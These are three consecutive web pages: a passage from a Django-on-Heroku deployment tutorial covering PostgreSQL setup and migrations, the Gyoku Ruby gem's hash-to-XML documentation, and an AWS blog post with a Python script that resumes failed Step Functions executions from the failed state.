run, and
teardown. If a controller can't be found, it probably means that namespace doesn't exist, and it's actually a single command. We'll try to find a single command and run its respective callable, otherwise the app will exit with an error.
There's also a new
app_signature property that lets us customize a one-liner to tell people how to use the app.
The
App Class
Following, the contents of the updated
App class:
<?php namespace Minicli; class App { protected $printer; protected $command_registry; protected $app_signature; public function __construct() { $this->printer = new CliPrinter(); $this->command_registry = new CommandRegistry(__DIR__ . '/../app/Command'); } public function getPrinter() { return $this->printer; } public function getSignature() { return $this->app_signature; } public function printSignature() { $this->getPrinter()->display(sprintf("usage: %s", $this->getSignature())); } public function setSignature($app_signature) { $this->app_signature = $app_signature; } public function registerCommand($name, $callable) { $this->command_registry->registerCommand($name, $callable); } public function runCommand(array $argv = []) { $input = new CommandCall($argv); if (count($input->args) < 2) { $this->printSignature(); exit; } $controller = $this->command_registry->getCallableController($input->command, $input->subcommand); if ($controller instanceof CommandController) { $controller->boot($this); $controller->run($input); $controller->teardown(); exit; } $this->runSingle($input); } protected function runSingle(CommandCall $input) { try { $callable = $this->command_registry->getCallable($input->command); call_user_func($callable, $input); } catch (\Exception $e) { $this->getPrinter()->display("ERROR: " . $e->getMessage()); $this->printSignature(); exit; } } }
Save the file when you're done updating its content.
4. Refactoring Abstract and Concrete Command Controllers
Now it's time to update the abstract class that is inherited by our Controllers, in order to include a few handy methods to retrieve parameters and to work as shortcut for accessing Application components such as the Printer.
Open the
CommandController class:
lib/CommandController.php
Under the new "contract", Controllers will have to implement a method named
handle. Externally, nothing will change:
run is still the public method that will be executed from the
App class. The change is to enable intercepting the
CommandCall data and make it available for all protected controller methods.
The
teardown method is optional and for that reason is empty, so it can be overwritten in children controllers.
The
CommandController Class
Following, the contents of the updated
CommandController abstract class:
<?php namespace Minicli; abstract class CommandController { protected $app; protected $input; abstract public function handle(); public function boot(App $app) { $this->app = $app; } public function run(CommandCall $input) { $this->input = $input; $this->handle(); } public function teardown() { // } protected function getArgs() { return $this->input->args; } protected function getParams() { return $this->input->params; } protected function hasParam($param) { return $this->input->hasParam($param); } protected function getParam($param) { return $this->input->getParam($param); } protected function getApp() { return $this->app; } protected function getPrinter() { return $this->getApp()->getPrinter(); } }
Save the file when you're done updating its content.
We'll need to move our current
hello command to follow the designated directory structure:
cd minicli
mkdir app/Command/Hello
Because we now use a
command subcommand nomenclature, we'll have to create a subcommand inside the
hello namespace. To create a subcommand named
name, you should use
NameController as class name.
Let's copy the
HelloController to the
hello namespace and rename it to
NameController.php.
mv app/Command/HelloController.php app/Command/Hello/NameController.php
Now we need to update this file to rename the class and implement the
handle method, removing the old
run implementation. Open file with:
app/Command/Hello/NameController.php
The
NameController Class
Following, the contents of the updated NameController class, formerly HelloController.
<?php namespace App\Command\Hello; use Minicli\CommandController; class NameController extends CommandController { public function handle() { $name = $this->hasParam('user') ? $this->getParam('user') : 'World'; $this->getPrinter()->display(sprintf("Hello, %s!", $name)); } }
Save the file when you're done updating its content.
5. Updating and running
minicli
The last thing we need to do is update the
minicli script to reflect all the changes. We'll set a signature and register a single
help command to test out our named parameters feature.
Open the file with:
cd minicli
nano minicli
The
minicli Script
Replace the current contents of your
minicli script with the following code:
#!/usr/bin/php <?php if (php_sapi_name() !== 'cli') { exit; } require __DIR__ . '/vendor/autoload.php'; use Minicli\App; use Minicli\CommandCall; $app = new App(); $app->setSignature("minicli hello name [ user=name ]"); $app->registerCommand("help", function(CommandCall $call) use ($app) { $app->printSignature(); print_r($call->params); }); $app->runCommand($argv);
Save the file when you're done.
6. Testing the Changes
Now you can execute the
hello name command with:
./minicli hello name
or
./minicli hello name user=erika
To test named parameters, run:
./minicli help name=value name2=value2
You'll get output like this:
usage: minicli hello name [ user=name ]
Array
(
    [name] => value
    [name2] => value2
)
Conclusion
In this guide, we refactored our
minicli micro framework to support a better organizational command structure and to enable autoloading command controllers.
You can find the full refactored code in the 0.1.3 release of
minicli.
In the next and final part of this series, we'll wrap up everything to release
minicli 1.0.
Discussion (5)
Hello you,
That's very great and usefull tutorial. It's a very trick that before articles, and it takes more in-deep to understand it, but, I've really learn a clean code structure.
Thanks for sharing!!
Thank you, I appreciate your feedback!
I loved it, thank you for sharing!
Thank you! 😊
Thanks, Erika.
Good article!
|
https://dev.to/erikaheidi/building-minicli-autoloading-command-namespaces-3ljm
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
2018-03-05
Announcing Dotty 0.6.0 and 0.7.0-RC1
Today, we are excited to release Dotty versions 0.6.0 and 0.7.0-RC1. These releases serve as a technology preview that demonstrates new language features and the compiler supporting them.
If you’re not familiar with Dotty, it's a platform to try out new language concepts and compiler technologies for Scala. The focus is mainly on simplification. We remove extraneous syntax (e.g. no XML literals), and try to boil down Scala’s types into a smaller set of more fundamental constructs. The theory behind these constructs is researched in DOT, a calculus for dependent object types. You can learn more about Dotty on our website.
This is our seventh scheduled release according to our 6-week release schedule. The previous technology preview focussed on bug fixes and stability work.
What’s new in the 0.7.0-RC1 technology preview?
Enum Simplification #4003
The previously introduced syntax and rules for enum were arguably too complex. We can considerably simplify them by taking away one capability: that cases can have bodies which can define members. Arguably, if we choose an ADT decomposition of a problem, it's good style to write all methods using pattern matching instead of overriding individual cases. So this removes an unnecessary choice. We now treat enums unequivocally as classes. They can have methods and other statements just like other classes can. Cases in enums are seen as a form of constructors. We do not need a distinction between enum class and enum object anymore. Enums can have companion objects just like normal classes can, of course.
Let's consider how
Option can be represented as an enum. Previously using an enum class:
enum class Option[+T] { def isDefined: Boolean } object Option { case Some[+T](x: T) { def isDefined = true } case None { def isDefined = false } def apply[T](x: T): Option[T] = if (x == null) None else Some(x) }
And now:
enum Option[+T] { case Some(x: T) case None def isDefined: Boolean = this match { case None => false case Some(_) => true } } object Option { def apply[T](x: T): Option[T] = if (x == null) None else Some(x) }
For more information about Enumerations and how to use them to model Algebraic Data Types, visit the respective sections in our documentation.
Erased terms #3342
The
erased modifier can be used on parameters,
val and
def to enforce that no reference to
those terms is ever used. As they are never used, they can safely be removed during compilation.
One particular use case is to add implicit type constraints that are only relevant at compilation
time. For example, let's consider the following implementation of
flatten.
class List[X] { def flatten[Y](implicit erased ev: X <:< List[Y]): List[Y] = { val buffer = new mutable.ListBuffer[Y] this.foreach(e => buffer ++= e.asInstanceOf[List[Y]]) buffer.toList } } List(List(1, 2), List(3)).flatten // List(1, 2, 3) List(1, 2, 3).flatten // error: Cannot prove that Int <:< List[Y]
The implicit evidence
ev is only used to constrain the type parameter
X of
List such that we
can safely cast from
X to
List[_]. The usage of the
erased modifier ensures that the evidence
is not used and can be safely removed at compilation time.
For more information, visit the Erased Terms section of our documentation.
Note: Erased terms replace phantom types: they have similar semantics, but with the added advantage that any type can be an erased parameter. See #3410.
Improved IDE support #3960
The Dotty language server now supports context sensitive IDE completions. Completions now include local and imported definitions. Members completions take possible implicit conversions into account.
We also improved the
find references functionality. It is more robust and much faster!
Try it out in Visual Studio Code!
Better and safer types in pattern matching (improved GADT support)
Consider the following implementation of an evaluator for a very simple
language containing only integer literals (
Lit) and pairs (
Pair):
sealed trait Exp case class Lit(value: Int) extends Exp case class Pair(fst: Exp, snd: Exp) extends Exp object Evaluator { def eval(e: Exp): Any = e match { case Lit(x) => x case Pair(a, b) => (eval(a), eval(b)) } eval(Lit(1)) // 1: Any eval(Pair(Pair(Lit(1), Lit(2)), Lit(3))) // ((1, 2), 3) : Any }
This code is correct but it's not very type-safe since
eval returns a value
of type
Any, we can do better by adding a type parameter to
Exp that
represents the result type of evaluating the expression:
sealed trait Exp[T] case class Lit(value: Int) extends Exp[Int] case class Pair[A, B](fst: Exp[A], snd: Exp[B]) extends Exp[(A, B)] object Evaluator { def eval[T](e: Exp[T]): T = e match { case Lit(x) => // In this case, T = Int x case Pair(a, b) => // In this case, T = (A, B) where A is the type of a and B is the type of b (eval(a), eval(b)) } eval(Lit(1)) // 1: Int eval(Pair(Pair(Lit(1), Lit(2)), Lit(3))) // ((1, 2), 3) : ((Int, Int), Int) }
Now the expression
Pair(Pair(Lit(1), Lit(2)), Lit(3))) has type
Exp[((Int, Int), Int)] and calling
eval on it will return a value of type
((Int, Int), Int) instead of
Any.
Something subtle is going on in the definition of
eval here: its result type
is
T which is a type parameter that could be instantiated to anything, and
yet in the
Lit case we are able to return a value of type
Int, and in the
Pair case a value of a tuple type. In each case the typechecker has been able
to constrain the type of
T through unification (e.g. if
e matches
Lit(x)
then
Lit is a subtype of
Exp[T], so
T must be equal to
Int). This is
usually referred to as GADT support in Scala since it closely mirrors the
behavior of Generalized Algebraic Data
Types in
Haskell and other languages.
GADTs have been a part of Scala for a long time, but in Dotty 0.7.0-RC1 we
significantly improved their implementation to catch more issues at
compile-time. For example, writing
(eval(a), eval(a)) instead of
(eval(a), eval(b)) in the example above should be an error, but it was not caught by
Scala 2 or previous versions of Dotty, whereas we now get a type mismatch error
as expected. More work remains to be done to fix the remaining GADT-related
issues,
but so far no show-stopper has been found.
Trying out Dotty
Scastie
Scastie, the online Scala playground, supports Dotty. This is an easy way to try Dotty without installing anything.
sbt
Using sbt 0.13.13 or newer, do:
sbt new lampepfl/dotty.g8
This will setup a new sbt project with Dotty as compiler. For more details on using Dotty with sbt, see the example project.
IDE support
It is very easy to start using the Dotty IDE in any Dotty project; see the IDE sections of the getting started documentation for details.
Contributors
Thank you to all the contributors who made this release possible! According to git shortlog -sn --no-merges 0.6.0..0.7.0-RC1 these are:
182 Martin Odersky
94 Nicolas Stucki
48 Olivier Blanvillain
38 liu fengyun
16 Allan Renucci
15 Guillaume Martres
11 Aggelos Biboudis
5 Abel Nieto
5 Paolo G. Giarrusso
4 Fengyun Liu
2 Georg Schmid
1 Jonathan Skowera
1 Fedor Shiriaev
1 Alexander Slesarenko
1 benkobalog
1 Jimin Hsieh
|
http://dotty.epfl.ch/blog/2018/03/05/seventh-dotty-milestone-release.html
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
Prefetch normal module requests, causing them to be resolved and built before the first
import or
require of that module occurs. Using this plugin can boost performance. Try to profile the build first to determine clever prefetching points.
new webpack.PrefetchPlugin([context], request);
context: An absolute path to a directory
request: A request string for a normal module
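For example, a webpack.config.js entry using the plugin might look like the following sketch (the prefetched module path is hypothetical):
// webpack.config.js
const webpack = require('webpack');

module.exports = {
  // ...
  plugins: [
    // Resolve and build ./src/heavy-module.js ahead of its first import
    new webpack.PrefetchPlugin(__dirname, './src/heavy-module.js')
  ]
};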
|
https://webpack.js.org/plugins/prefetch-plugin/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
An Overview and Example of Android Event Handling
Much has been covered in the previous chapters relating to the design of user interfaces for Android applications. An area that has yet to be covered, however, involves the way in which a user’s interaction with the user interface triggers the underlying activity to perform a task. In other words, we know from the previous chapters how to create a user interface containing a button view, but not how to make something happen within the application when it is touched by the user.
The primary objective of this chapter, therefore, is to provide an overview of event handling in Android applications. Once the basics of event handling have been covered, the next chapter will cover touch event handling in terms of detecting multiple touches and touch motion.
Understanding Android Events
Events in Android can take a variety of different forms, but are usually generated in response to an external action. The most common form of events, particularly for devices such as tablets and smartphones, involve some form of interaction with the touch screen. Such events fall into the category of input events.
The Android framework maintains an event queue into which events are placed as they occur. Events are then removed from the queue on a first-in, first-out (FIFO) basis. In the case of an input event such as a touch on the screen, the event is passed to the view positioned at the location on the screen where the touch took place. In addition to the event notification, the view is also passed a range of information (depending on the event type) about the nature of the event such as the coordinates of the point of contact between the user’s fingertip and the screen.
In order to be able to handle the event that it has been passed, the view must have in place an event listener. The Android View class, from which all user interface components are derived, contains a range of event listener interfaces, each of which contains an abstract declaration for a callback method. In order to be able to respond to an event of a particular type, a view must register the appropriate event listener and implement the corresponding callback. For example, if a button is to respond to a click event (the equivalent to the user touching and releasing the button view as though clicking on a physical button) it must both register the View.onClickListener event listener (via a call to the target view’s setOnClickListener() method) and implement the corresponding onClick() callback method. In the event that a “click” event is detected on the screen at the location of the button view, the Android framework will call the onClick() method of that view when that event is removed from the event queue. It is, of course, within the implementation of the onClick() callback method that any tasks should be performed or other methods called in response to the button click.
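As an illustration of this pattern (assuming a button with the ID button1, as in the example that follows), the listener registration and callback might be implemented within the activity's onCreate() method along these lines:
Button button = (Button) findViewById(R.id.button1);

button.setOnClickListener(new View.OnClickListener() {
    @Override
    public void onClick(View view) {
        // Code to be performed in response to the click goes here
    }
});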
Using the android:onClick Resource
Before exploring event listeners in more detail it is worth noting that a shortcut is available when all that is required is for a callback method to be called when a user “clicks” on a button view in the user interface. Consider a user interface layout containing a button view named button1 with the requirement that when the user touches the button, a method called buttonClick() declared in the activity class is called. All that is required to implement this behavior is to write the buttonClick() method (which takes as an argument a reference to the view that triggered the click event) and add a single line to the declaration of the button view in the XML file. For example:
<Button android:id="@+id/button1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:onClick="buttonClick" />
This provides a simple way to capture click events. It does not, however, provide the range of options offered by event handlers, which are the topic of the rest of this chapter.
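For reference, a minimal sketch of what the corresponding method in the activity class might look like; the Toast message body is an illustrative assumption (and requires the android.widget.Toast import), as the only requirements are that the method is public, returns void, and accepts a single View parameter:
public void buttonClick(View view) {
    // Called by the framework when button1 is clicked, because the layout
    // declares android:onClick="buttonClick" on that view.
    Toast.makeText(this, "Button clicked", Toast.LENGTH_SHORT).show();
}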
Event Listeners and Callback Methods
- onClickListener – Used to detect click style events whereby the user touches and then releases an area of the device display occupied by a view. Corresponds to the onClick() callback method which is passed a reference to the view that received the event as an argument.
- onLongClickListener – Used to detect when the user maintains the touch over a view for an extended period. Corresponds to the onLongClick() callback method which is passed the view that received the event as an argument.
- onTouchListener – Used to detect any form of contact with the touch screen including individual or multiple touches and gesture motions. Corresponding with the onTouch() callback, this topic will be covered in greater detail in the chapter entitled Android Touch and Multi-touch Event Handling. The callback method is passed the view that received the event and a MotionEvent object as arguments.
- onCreateContextMenuListener – Listens for the creation of a context menu as the result of a long click. Corresponds to the onCreateContextMenu() callback method. The callback is passed the menu, the view that received the event and a menu context object.
- onFocusChangeListener – Detects when focus moves away from the current view as the result of interaction with a track-ball or navigation key. Corresponds to the onFocusChange() callback method which is passed the view that received the event and a Boolean value to indicate whether focus was gained or lost.
- onKeyListener – Used to detect when a key on a device is pressed while a view has focus. Corresponds to the onKey() callback method. Passed as arguments are the view that received the event, the KeyCode of the physical key that was pressed and a KeyEvent object.
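To make the registration pattern behind the listeners listed above concrete, the following is a hedged sketch of attaching one of them, an onTouchListener, to a view. The view id myView and the log tag are assumptions for illustration (and the snippet assumes the android.view.MotionEvent and android.util.Log imports); the same register-listener/implement-callback shape applies to each listener in the list:
View myView = findViewById(R.id.myView);

myView.setOnTouchListener(new View.OnTouchListener() {
    @Override
    public boolean onTouch(View v, MotionEvent event) {
        // The MotionEvent argument describes the touch; returning true
        // consumes the event so it is not passed to other listeners.
        Log.i("EventExample", "Touch at " + event.getX() + ", " + event.getY());
        return true;
    }
});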
An Event Handling Example
In the remainder of this chapter, we will work through the creation of a simple application designed to demonstrate the implementation of an event listener and callback method to detect when the user has clicked on a button. The code within the callback method will update a text view to indicate that the event has been processed.
Launch Eclipse and create an Android Application Project named EventExample with the appropriate package name and SDK selections. As with previous examples, request the creation of a blank activity and the use of the default launcher icons. On the New Blank Activity screen of the New Android Application wizard, set the Activity Name to EventExampleActivity, the Layout Name to activity_event_example and the Fragment Layout to fragment_event_example.
Designing the User Interface
The user interface layout for the EventExampleActivity class in this example is to consist of a RelativeLayout view, a Button and a TextView as illustrated in Figure 17-1.
Figure 17-1
Locate and select the fragment_event_example.xml file created by Eclipse (located in the Package Explorer under EventExample -> res -> layout -> fragment_event_example.xml) and double click on it to load it into the editing panel. Switch from the Graphical Layout tool to the XML file using the tab at the bottom of the editing panel and delete the current content of the file. With a blank canvas, either use the Graphical Layout tool to design the user interface from Figure 17-1 (making sure to change the IDs of the Button and TextView objects to myButton and myTextView respectively), or directly enter the following XML into the editor:
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="match_parent"
    android:layout_height="match_parent" >

    <Button
        android:id="@+id/myButton"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_centerInParent="true" />

    <TextView
        android:id="@+id/myTextView"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_above="@+id/myButton"
        android:layout_centerHorizontal="true" />

</RelativeLayout>
Within the Graphical Layout tool, right-click on the Button view and select the Edit Text… menu option. In the Resource Chooser dialog, click on the New String… button and in the Create New Android String dialog, enter Press Me into the String field and mybutton_string into the New R.string field:
Figure 17-2
Click on OK in the new android string dialog to create the new string resource and then again in the resource chooser dialog to assign the string to the button view.
Repeat these steps on the TextView object to create a new string resource named mytextview_string with a string that reads “Status”. Be sure to save the file once the changes are complete.
With the user interface layout now completed, the next step is to register the event listener and callback method.
The Event Listener and Callback Method
For the purposes of this example, an onClickListener needs to be registered for the myButton view. This is achieved by making a call to the setOnClickListener() method of the button view, passing through a new onClickListener object as an argument and implementing the onClick() callback method. Since this is a task that only needs to be performed when the activity is created, a good option is to override the onStart() lifecycle method of the EventExampleActivity class.
Within the Package Explorer panel, navigate to the EventExampleActivity.java file (src -> <package name> -> EventExampleActivity.java) and double click on it to load it into the code editor. Once loaded, implement the onStart() method to obtain a reference to the button view, register the event listener and implement the onClick() callback method:
package com.example.eventexample;

import android.app.Activity;
import android.app.ActionBar;
import android.app.Fragment;
import android.os.Bundle;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuItem;
import android.view.View;
import android.view.ViewGroup;
import android.os.Build;
import android.widget.Button;
import android.widget.TextView;

public class EventExampleActivity extends Activity {
.
.
.
    @Override
    protected void onStart() {
        super.onStart();

        Button button = (Button)findViewById(R.id.myButton);

        button.setOnClickListener(
            new Button.OnClickListener() {
                public void onClick(View v) {
                }
            }
        );
    }
.
.
.
}
The above code has now registered the event listener on the button and implemented the onClick() method. If the application were to be run at this point, however, there would be no indication that the event listener installed on the button was working since there is, as yet, no code implemented within the body of the onClick() callback method. The goal for the example is to have a message appear on the TextView when the button is clicked, so some further code changes need to be made:
@Override
protected void onStart() {
    super.onStart();

    Button button = (Button)findViewById(R.id.myButton);

    button.setOnClickListener(
        new Button.OnClickListener() {
            public void onClick(View v) {
                TextView myTextView = (TextView)findViewById(R.id.myTextView);
                myTextView.setText("Button clicked");
            }
        }
    );
}
Complete this phase of the tutorial by compiling and running the application on either an AVD emulator or physical Android device. On touching and releasing the button view (otherwise known as “clicking”) the text view should change to display the “Button clicked” text.
Consuming Events
The detection of standard clicks (as opposed to long clicks) on views is a very simple case of event handling. The example will now be extended to include the detection of long click events which occur when the user clicks and holds a view on the screen and, in doing so, cover the topic of event consumption.
Consider the code for the onClick() method in the above section of this chapter. The callback is declared as void and, as such, does not return a value to the Android framework after it has finished executing.
The onLongClick() callback method of the onLongClickListener interface, on the other hand, is required to return a Boolean value to the Android framework. The purpose of this return value is to indicate to the Android runtime whether the callback has consumed the event or not. If the callback returns a true value, the event is discarded by the framework. If, on the other hand, the callback returns a false value the Android framework will consider the event still to be active and will consequently pass it along to the next matching event listener that is registered on the same view.
As with many programming concepts this is, perhaps, best demonstrated with an example. The first step is to add an event listener and callback method for long clicks to the button view in the example activity:
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_event_example);

    Button button = (Button)findViewById(R.id.myButton);

    button.setOnClickListener(
        new Button.OnClickListener() {
            public void onClick(View v) {
                TextView myTextView = (TextView)findViewById(R.id.myTextView);
                myTextView.setText("Button clicked");
            }
        }
    );

    button.setOnLongClickListener(
        new Button.OnLongClickListener() {
            public boolean onLongClick(View v) {
                TextView myTextView = (TextView)findViewById(R.id.myTextView);
                myTextView.setText("Long button click");
                return true;
            }
        }
    );
}
Clearly, when a long click is detected, the onLongClick() callback method will display “Long button click” on the text view. Note, however, that the callback method also returns a value of true to indicate that it has consumed the event. Compile and run the application and press and hold a fingertip over the button view until the “Long button click” text appears in the text view. On releasing the button, the text view continues to display the “Long button click” text indicating that the onClick() callback method was not called.
Next, modify the code such that the onLongClick() method now returns a false value:
button.setOnLongClickListener( new Button.OnLongClickListener() { public boolean onLongClick(View v) { TextView myTextView = (TextView)findViewById(R.id.myTextView); myTextView.setText("Long button click"); return false; } } );
Once again, compile and run the application and perform a long click on the button until the long click message appears. Upon releasing the button this time, however, note that the onClick() callback is also triggered and the text changes to “Button clicked”. This is because the false value returned by the onLongClick() callback method indicated to the Android framework that the event was not consumed by the method and was eligible to be passed on to the next registered listener on the view. In this case, the runtime ascertained that the onClickListener on the button was also interested in events of this type and subsequently called the onClick() callback method.
Summary
A user interface is of little practical use if the views it contains do not do anything in response to user interaction. Android bridges that gap with event listeners: a listener is registered on a view and, when the corresponding event is removed from the event queue, the listener’s callback method is called. The callback method then performs any tasks required by the activity before returning. Some callback methods are required to return a Boolean value to indicate whether the event needs to be passed on to any other event listeners registered on the view or discarded by the system.
Having covered the basics of event handling, the next chapter will explore in some depth the topic of touch events with a particular emphasis on handling multiple touches.
|
https://www.techotopia.com/index.php?title=An_Overview_and_Example_of_Android_Event_Handling&oldid=29532
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
You have now learned the fundamental structure of methods, but there are still many other features you have to learn. For example, take the code below that was shown in lesson 1 (What is Programming).
public static String toBaseN(int num, int base) {
    String newNum = "";
    while (num > 0) {
        int result = num % base;
        newNum = result + newNum;
        num /= base;
    }
    return newNum;
}
This method converts a number to a different base. In this lesson, we cover how to use this method. In order to make this method run, we have to add a method call somewhere else in the program. The structure of a method call is the method name followed by a parenthesized argument list, such as methodName(argument1, argument2).
Below is a main method containing a method call to the method
toBaseN(int num, int base).
public static void main(String[] args) {
    String newValue = toBaseN(55, 2);
    System.out.println(newValue); // will output 110111
}
The method name signals the computer as to which method is being used, and the parameters list provides the specific inputs needed for that method. If the method has no parameters, the parameter list is left empty. For example, if the method
toBaseN(int num, int base) had no parameters, the method call would be:
toBaseN();
Note: The method calls
toBaseN(55, 2) and
toBaseN() only work if it is being called in the same class. Since classes have not been covered, and we have only worked in one class so far, simply understand this syntax only works when working in a single class.
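Putting these pieces together, here is a minimal, self-contained sketch of the lesson’s example. The class name BaseConverter is an assumption added for illustration; any single class containing both the method and the main method works the same way:
public class BaseConverter {

    // Converts num to its representation in the given base
    // (digits only, so this version is meant for bases up to 10).
    public static String toBaseN(int num, int base) {
        String newNum = "";
        while (num > 0) {
            int result = num % base;
            newNum = result + newNum;
            num /= base;
        }
        return newNum;
    }

    public static void main(String[] args) {
        String newValue = toBaseN(55, 2); // method call with two arguments
        System.out.println(newValue);     // prints 110111
    }
}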
Finally, method overloading is used when you want two methods to have the same name but different parameter lists. Below is an example of two methods that demonstrate this idea:
// adds the word two to the end of a string
public String addTwo(String str) {
    return (str + " two");
}

// adds the number two to an integer
public int addTwo(int num) {
    return (num + 2);
}
Both of these methods may be useful, and both are appropriately named
addTwo, so method overloading is brought into effect. It is useful to note that method overloading is driven by differences in the parameter lists, not by differences in return types. Overloading still works when the methods have the same return type, but it does not work when they have identical parameter lists. Below is an example of invalid method overloading:
// adds the word two to the end of a string
public String addTwo(String str) {
    return (str + " two");
}

// adds the number two to the end of a string
public int addTwo(String num) {
    return (num + 2);
}
A method call of
addTwo in the above scenario would result in an error because they have the same parameter type (
String). Method calls and the concept of method overloading are both important to understanding how to create and use methods.
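As a quick illustration of how the compiler chooses between the valid overloads shown earlier, consider the sketch below. The enclosing class and main method are assumptions added for this example, and the methods are declared static here so they can be called directly from main:
public class OverloadDemo {

    public static String addTwo(String str) {
        return (str + " two");
    }

    public static int addTwo(int num) {
        return (num + 2);
    }

    public static void main(String[] args) {
        // The argument type decides which overload runs.
        System.out.println(addTwo("one")); // String parameter -> prints "one two"
        System.out.println(addTwo(5));     // int parameter    -> prints 7
    }
}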
Lesson Quiz
1. What is method overloading?
2. What is wrong with the code below?
public static int addTwo(int num) {
    return (num + 2);
}

public static void main(String[] args) {
    System.out.println(addTwo());
}
Written by Chris Elliott
Notice any mistakes? Please email us at [email protected] so that we can fix any inaccuracies.
|
https://teamscode.com/learn/ap-computer-science/advanced-methods/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
Plugins grant unlimited opportunity to perform customizations within the webpack build system. This allows you to create custom asset types, perform unique build modifications, or even enhance the webpack runtime while using middleware. The following are some features of webpack that become useful while writing plugins.
After a compilation is sealed, all structures within the compilation may be traversed.
class MyPlugin {
  apply(compiler) {
    compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => {
      // Explore each chunk (build output):
      compilation.chunks.forEach(chunk => {
        // Explore each module within the chunk (built inputs):
        chunk.modules.forEach(module => {
          // Explore each source file path that was included into the module:
          module.fileDependencies.forEach(filepath => {
            // we've learned a lot about the source structure now...
          });
        });
        // Explore each asset filename generated by the chunk:
        chunk.files.forEach(filename => {
          // Get the asset source for each file generated by the chunk:
          var source = compilation.assets[filename].source();
        });
      });
      callback();
    });
  }
}
module.exports = MyPlugin;
compilation.modules: An array of modules (built inputs) in the compilation. Each module manages the build of a raw file from your source library.
module.fileDependencies: An array of source file paths included into a module. This includes the source JavaScript file itself (ex:
index.js), and all dependency asset files (stylesheets, images, etc) that it has required. Reviewing dependencies is useful for seeing what source files belong to a module.
compilation.chunks: An array of chunks (build outputs) in the compilation. Each chunk manages the composition of a final rendered assets.
chunk.modules: An array of modules that are included into a chunk. By extension, you may look through each module's dependencies to see what raw source files fed into a chunk.
chunk.files: An array of output filenames generated by the chunk. You may access these asset sources from the compilation.assets table.
While running webpack middleware, each compilation includes a
fileDependencies array (what files are being watched) and a
fileTimestamps hash that maps watched file paths to a timestamp. These are extremely useful for detecting what files have changed within the compilation:
class MyPlugin {
  constructor() {
    this.startTime = Date.now();
    this.prevTimestamps = {};
  }
  apply(compiler) {
    compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => {
      var changedFiles = Object.keys(compilation.fileTimestamps).filter(
        watchfile => {
          return (
            (this.prevTimestamps[watchfile] || this.startTime) <
            (compilation.fileTimestamps[watchfile] || Infinity)
          );
        }
      );
      this.prevTimestamps = compilation.fileTimestamps;
      callback();
    });
  }
}
module.exports = MyPlugin;
You may also feed new file paths into the watch graph to receive compilation triggers when those files change. Simply push valid file paths into the
compilation.fileDependencies array to add them to the watch. Note: the
fileDependencies array is rebuilt in each compilation, so your plugin must push its own watched dependencies into each compilation to keep them under watch.
Similar to the watch graph, it's fairly simple to monitor changed chunks (or modules, for that matter) within a compilation by tracking their hashes.
class MyPlugin {
  constructor() {
    this.chunkVersions = {};
  }
  apply(compiler) {
    compiler.hooks.emit.tapAsync('MyPlugin', (compilation, callback) => {
      var changedChunks = compilation.chunks.filter(chunk => {
        var oldVersion = this.chunkVersions[chunk.name];
        this.chunkVersions[chunk.name] = chunk.hash;
        return chunk.hash !== oldVersion;
      });
      callback();
    });
  }
}
module.exports = MyPlugin;
|
https://webpack.js.org/contribute/plugin-patterns/
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
sw/source/filter/xml/xmltbli.cxx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
New commits: commit 7749e10198dc1ca49f39955a706209da65a818c4 Author: Stephan Bergmann <sberg...@redhat.com> Date: Fri Feb 9 09:32:06 2018 +0100 ...and Clang is not affected at all (It wouldn't really hurt to have the line enabled for more toolchains than necessary, as redeclaration of static constexpr data members outside the class is still supported for backwards-compatibility in C++17, though deprecated. However, recording a precise upper bound on toolchains in the #if allows to eventually get rid of this code, once we no longer support any affected toolchain.) Change-Id: I40ae37e7006754cc89538d5c97230200a2ca633c Reviewed-on: Tested-by: Jenkins <c...@libreoffice.org> Reviewed-by: Stephan Bergmann <sberg...@redhat.com> diff --git a/sw/source/filter/xml/xmltbli.cxx b/sw/source/filter/xml/xmltbli.cxx index 5159cc92b6dd..c7997b0fb16e 100644 --- a/sw/source/filter/xml/xmltbli.cxx +++ b/sw/source/filter/xml/xmltbli.cxx @@ -1228,7 +1228,7 @@ public: } }; -#if __cplusplus <= 201402 || (defined __GNUC__ && __GNUC__ <= 6) +#if __cplusplus <= 201402 || (defined __GNUC__ && __GNUC__ <= 6 && !defined __clang__) constexpr sal_Int32 SwXMLTableContext::MAX_WIDTH; #endif _______________________________________________ Libreoffice-commits mailing list libreoffice-comm...@lists.freedesktop.org
|
https://www.mail-archive.com/libreoffice@lists.freedesktop.org/msg208774.html
|
CC-MAIN-2019-04
|
en
|
refinedweb
|
How to Use Emacs, an Excellent Clojure Editor
On your journey to Clojure mastery, your editor will be your closest ally. I highly recommend working with Emacs, but you can, of course, use any editor you want. If you don’t follow the thorough Emacs instructions in this chapter, or if you choose to use a different editor, it’s worthwhile to at least invest some time in setting up your editor to work with a REPL. Two alternatives that I recommend and that are well regarded in the community are Cursive and Nightcode.
The reason I recommend Emacs is that it offers tight integration with a Clojure REPL, which allows you to instantly try out your code as you write. That kind of tight feedback loop will be useful while learning Clojure and, later, when writing real Clojure programs. Emacs is also great for working with any Lisp dialect; in fact, Emacs is written in a Lisp dialect called Emacs Lisp (elisp).
By the end of this chapter, your Emacs setup will look something like Figure 2-1.
To get there, you’ll start by installing Emacs and setting up a new-person-friendly Emacs configuration. Then you’ll learn the basics: how to open, edit, and save files, and how to interact with Emacs using essential key bindings. Finally, you’ll learn how to actually edit Clojure code and interact with the REPL.
Installation
You should use the latest major version of Emacs, Emacs 24, for the platform you’re working on:
- OS X Install vanilla Emacs as a Mac app from. Other options, like Aquamacs, are supposed to make Emacs more “Mac-like,” but they’re problematic in the long run because they’re set up so differently from standard Emacs that it’s difficult to use the Emacs manual or follow along with tutorials.
- Ubuntu Follow the instructions at.
- Windows You can find a binary at. After you download and unzip the latest version, you can run the Emacs executable under bin\runemacs.exe.
